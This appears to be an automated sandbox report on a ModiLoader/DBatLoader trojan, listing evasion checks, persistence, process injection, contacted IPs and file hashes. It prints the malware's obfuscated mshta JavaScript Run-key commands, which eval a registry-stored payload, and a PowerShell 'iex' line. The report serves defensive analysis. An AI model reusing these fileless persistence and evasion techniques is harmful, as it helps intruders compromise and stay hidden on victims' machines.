Malware Analysis Report

2024-10-23 19:35

Sample ID 240505-sg5zmsgf27
Target 183da5248aa31d95f9462a9b49c50b36_JaffaCakes118
SHA256 252f271550eb6a0ec533597feb9d63f5ef308388935a4734159b1d60ec0c878e
Tags
modiloader evasion persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

252f271550eb6a0ec533597feb9d63f5ef308388935a4734159b1d60ec0c878e

Threat Level: Known bad

The file 183da5248aa31d95f9462a9b49c50b36_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

modiloader evasion persistence trojan

ModiLoader, DBatLoader

Process spawned unexpected child process

Looks for VirtualBox drivers on disk

Looks for VirtualBox Guest Additions in registry

ModiLoader Second Stage

Checks for common network interception software

Looks for VMWare Tools registry key

Deletes itself

Checks computer location settings

Drops startup file

Checks BIOS information in registry

Maps connected drives based on registry

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in System32 directory

Enumerates physical storage devices

Unsigned PE

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-05 15:06

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-05 15:06

Reported

2024-05-05 15:09

Platform

win7-20240215-en

Max time kernel

149s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\mshta.exe

Checks for common network interception software

evasion

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions C:\Windows\SysWOW64\regsvr32.exe N/A

Looks for VirtualBox drivers on disk

evasion
Description Indicator Process Target
File opened (read-only) C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys C:\Windows\SysWOW64\regsvr32.exe N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools C:\Windows\SysWOW64\regsvr32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2d7d1.lnk C:\Windows\SysWOW64\regsvr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:l0RPVr=\"rDrGQtc\";nN0=new%20ActiveXObject(\"WScript.Shell\");u02ncvHt=\"Do4Ay\";h8e0cL=nN0.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\atqjps\\\\xawh\");QtZM07=\"4VU9wy\";eval(h8e0cL);y3SuPU=\"UqA\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:g6tyH=\"y7HT9d\";iF6=new%20ActiveXObject(\"WScript.Shell\");ENf8EDDD=\"Y\";Tql55a=iF6.RegRead(\"HKCU\\\\software\\\\atqjps\\\\xawh\");L9bxQ8gO=\"INmisg\";eval(Tql55a);s41kOqzDC=\"o37\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\ed3e8\\d468b.lnk\"" C:\Windows\SysWOW64\regsvr32.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\Windows\SysWOW64\regsvr32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\SysWOW64\regsvr32.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\International C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\0f739\shell\open\command C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\0f739\shell\open\command\ = "\"C:\\Windows\\system32\\mshta.exe\" \"javascript:sIU24T=\"q0p8ok\";M9X=new ActiveXObject(\"WScript.Shell\");ta15Db=\"nwpJDD\";q4x8DW=M9X.RegRead(\"HKCU\\\\software\\\\atqjps\\\\xawh\");EHB1pLz=\"lD\";eval(q4x8DW);L2GzM=\"Xtz8\";\"" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\.cc93a6 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\.cc93a6\ = "0f739" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\0f739 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\0f739\shell C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\0f739\shell\open C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1728 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe
PID 1728 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe
PID 1728 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe
PID 1728 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe
PID 1728 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe
PID 1728 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe
PID 1728 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe
PID 1728 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe
PID 1728 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe
PID 1728 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe
PID 1728 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe
PID 2232 wrote to memory of 2420 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2232 wrote to memory of 2420 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2232 wrote to memory of 2420 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2232 wrote to memory of 2420 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2420 wrote to memory of 2624 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2420 wrote to memory of 2624 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2420 wrote to memory of 2624 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2420 wrote to memory of 2624 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2420 wrote to memory of 2624 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2420 wrote to memory of 2624 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2420 wrote to memory of 2624 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2420 wrote to memory of 2624 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2624 wrote to memory of 2904 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2624 wrote to memory of 2904 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2624 wrote to memory of 2904 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2624 wrote to memory of 2904 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2624 wrote to memory of 2904 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2624 wrote to memory of 2904 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2624 wrote to memory of 2904 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2624 wrote to memory of 2904 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe"

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" javascript:iqyPK8h="7SKSF";D5J6=new%20ActiveXObject("WScript.Shell");d4fAwY="BsV3K";x2Wjx8=D5J6.RegRead("HKLM\\software\\Wow6432Node\\gzaHwY\\HRdnfc1fd");OxxP32="EtHrq";eval(x2Wjx8);nM5GZPq="OT";

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:mrqlf

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

Network

Country Destination Domain Proto
US 204.136.199.196:80 tcp
FR 86.199.41.53:80 tcp
US 23.78.196.202:80 tcp
US 9.141.41.127:80 tcp
RS 178.220.38.24:80 tcp
DE 141.36.214.74:443 tcp
US 35.202.231.30:80 tcp
US 72.15.177.56:80 tcp
US 161.102.77.121:8080 tcp
DE 159.25.117.28:80 tcp
DE 51.163.32.182:80 tcp
US 139.56.255.25:80 tcp
EC 191.100.22.14:80 tcp
US 54.99.57.247:80 tcp
US 19.217.230.9:80 tcp
CN 222.130.70.147:80 tcp
ZA 105.185.3.9:8080 tcp
N/A 172.27.227.122:80 tcp
TW 120.124.239.153:80 tcp
AU 129.96.120.26:80 tcp
US 71.201.137.88:80 tcp
NL 178.225.201.242:80 tcp
CL 159.112.139.254:80 tcp
DE 53.51.245.233:443 tcp
US 24.95.212.243:80 tcp
US 34.4.192.137:80 tcp
US 209.152.29.168:80 tcp
CO 179.18.244.79:80 tcp
US 65.138.58.173:80 tcp
US 162.115.211.252:80 tcp
US 7.3.167.118:80 tcp
JP 219.115.247.106:80 tcp
US 173.136.59.174:80 tcp
GB 77.98.190.69:80 tcp
FR 91.168.139.131:80 tcp
CN 61.55.134.101:80 tcp
DE 53.31.92.178:80 tcp
US 23.241.91.23:80 tcp
US 6.178.62.180:80 tcp
US 158.142.177.152:8080 tcp
AU 1.18.19.87:80 tcp
US 69.8.50.57:80 tcp
JP 126.52.39.88:80 tcp
US 150.233.128.249:80 tcp
FR 109.210.250.156:80 tcp
KR 222.109.219.50:80 tcp
JP 133.227.72.15:80 tcp
US 135.159.101.109:80 tcp
US 64.221.6.59:80 tcp
GB 195.195.189.158:80 tcp
N/A 10.78.20.94:80 tcp
US 18.221.124.124:80 tcp
CN 219.129.45.11:80 tcp
AU 157.85.69.25:80 tcp
JP 203.189.97.118:80 tcp
IR 185.107.245.236:80 tcp
DE 77.3.41.115:80 tcp
BR 179.70.141.246:80 tcp
US 4.118.174.237:80 tcp
CN 1.189.160.160:80 tcp
CN 111.197.179.14:80 tcp
AU 20.11.63.213:80 tcp
US 199.70.213.38:8080 tcp
DE 217.189.156.213:80 tcp
US 44.60.114.18:80 tcp
US 23.220.148.221:80 tcp
ES 80.173.101.85:80 tcp
RU 176.193.151.25:80 tcp
US 56.162.124.242:80 tcp
LT 83.181.122.12:80 tcp
SA 2.89.246.89:80 tcp
CN 36.141.157.189:80 tcp
DE 53.31.180.157:80 tcp
US 165.153.255.162:80 tcp
US 147.140.120.123:80 tcp
AR 3.160.101.153:80 tcp
AR 3.160.101.153:80 3.160.101.153 tcp
IN 202.134.178.129:80 tcp
US 55.154.168.148:80 tcp
US 67.132.130.52:80 tcp
ZA 155.235.63.255:80 tcp
US 168.74.60.168:80 tcp
CN 36.49.106.118:80 tcp
FR 81.54.21.155:80 tcp
IL 109.186.88.123:80 tcp
US 28.91.130.66:80 tcp
US 30.113.223.190:80 tcp
KR 1.252.191.194:80 tcp
IT 5.88.228.10:80 tcp
US 54.114.96.4:80 tcp
JP 119.18.160.185:80 tcp
JP 150.79.255.171:80 tcp
NL 151.184.10.89:80 tcp
US 34.228.8.184:80 tcp
US 75.117.227.108:80 tcp
CO 181.138.130.27:80 tcp
US 68.128.31.227:80 tcp
CO 186.144.222.166:443 tcp
KR 222.109.1.148:80 tcp
US 35.10.210.233:80 tcp
US 141.246.136.129:80 tcp
CN 124.16.14.248:80 tcp
TW 150.116.63.204:80 tcp
US 166.205.147.168:80 tcp
KR 183.125.159.194:8080 tcp
CN 222.183.120.12:80 tcp
US 205.165.142.177:443 tcp
AT 79.174.113.105:80 tcp
BR 34.95.227.167:80 tcp
CA 142.89.77.146:80 tcp
US 56.21.210.88:80 tcp
RU 31.8.155.193:8080 tcp
GB 91.125.13.8:80 tcp
CN 115.148.191.62:443 tcp
US 76.136.56.125:80 tcp
GB 25.48.154.135:443 tcp
FR 78.199.118.16:443 tcp
US 134.12.40.177:80 tcp
IN 175.101.76.87:80 tcp
US 23.29.108.135:80 tcp
CN 36.135.12.200:80 tcp
US 24.245.176.18:80 tcp
US 198.154.45.190:80 tcp
TH 202.28.106.72:80 tcp
IR 37.202.194.191:80 tcp
CN 42.161.134.138:80 tcp
DE 77.37.103.172:80 tcp
IQ 37.239.120.158:80 tcp
US 63.78.66.248:80 tcp
RU 62.152.193.46:80 tcp
CN 117.66.51.192:443 tcp
US 138.180.238.131:80 tcp
JP 1.112.56.82:80 tcp
FI 77.86.243.82:80 tcp
US 30.238.122.24:80 tcp
US 152.46.217.109:443 tcp
US 206.10.1.96:443 tcp
RU 95.32.104.208:80 tcp
US 75.173.174.160:80 tcp
PT 93.102.2.114:80 tcp
CO 181.250.181.168:80 tcp
MX 187.160.90.254:80 tcp
CH 82.136.101.119:80 tcp
US 199.81.69.74:80 tcp
KR 59.186.182.13:80 tcp

Files

memory/1652-2-0x0000000000400000-0x000000000043A000-memory.dmp

memory/1652-4-0x0000000000400000-0x000000000043A000-memory.dmp

memory/1652-5-0x0000000000400000-0x000000000043A000-memory.dmp

memory/1652-6-0x0000000001DA0000-0x0000000001E76000-memory.dmp

memory/1652-7-0x0000000001DA0000-0x0000000001E76000-memory.dmp

memory/1652-10-0x0000000001DA0000-0x0000000001E76000-memory.dmp

memory/1652-9-0x0000000001DA0000-0x0000000001E76000-memory.dmp

memory/1652-8-0x0000000001DA0000-0x0000000001E76000-memory.dmp

memory/1652-11-0x0000000001DA0000-0x0000000001E76000-memory.dmp

memory/1652-12-0x0000000001DA0000-0x0000000001E76000-memory.dmp

memory/2420-21-0x0000000006200000-0x00000000062D6000-memory.dmp

memory/2624-23-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/2624-25-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/2420-26-0x0000000006200000-0x00000000062D6000-memory.dmp

memory/2624-27-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/2624-29-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/2624-34-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/2624-40-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/2624-28-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/2624-30-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/2624-48-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/2624-57-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/2624-47-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/2624-46-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/2624-49-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/2624-45-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/2624-59-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/2624-58-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/2624-56-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/2624-55-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/2624-54-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/2624-44-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/2624-43-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/2624-42-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/2624-41-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/2624-39-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/2624-38-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/2624-37-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/2624-36-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/2624-35-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/2624-33-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/2624-32-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/2624-31-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/2624-66-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/2904-67-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2904-82-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2904-81-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2904-80-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2904-79-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2904-77-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2904-75-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2904-74-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2904-72-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2904-71-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2904-70-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2904-68-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2904-78-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2904-76-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2904-73-0x0000000000210000-0x0000000000351000-memory.dmp

memory/2904-69-0x0000000000210000-0x0000000000351000-memory.dmp

C:\Users\Admin\AppData\Local\ed3e8\bc0ec.bat

MD5 c9726b1023d08f87d7c310ef440fc21a
SHA1 e121739a7d5fd0bd5e0a08827105a41798195629
SHA256 009c0ef73332c5aae4e96ba2013e33cda30f312c604c5b1e768c190a522160fc
